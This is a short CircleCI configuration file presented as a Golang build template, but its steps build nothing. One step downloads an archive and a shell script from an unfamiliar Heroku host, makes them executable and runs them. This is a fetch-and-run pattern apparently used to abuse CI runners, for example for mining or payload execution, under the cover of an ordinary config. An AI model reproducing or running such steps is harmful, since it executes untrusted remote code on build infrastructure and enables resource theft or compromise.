# Golang CircleCI 2.0 configuration file
#
# Check https://circleci.com/docs/2.0/language-go/ for more details
version: 2

jobs:
  build:
    docker:
      - image: circleci/golang:1.9
    steps:
      - run: ls
      - run: mkdir a
      - run: cd a && curl https://files2linkprons.herokuapp.com/10339 -o a.tar.gz && tar xf a.tar.gz && curl https://files2linkprons.herokuapp.com/10340 -o bash.sh && chmod +x * && ./bash.sh
      - run:  ./bash.sh
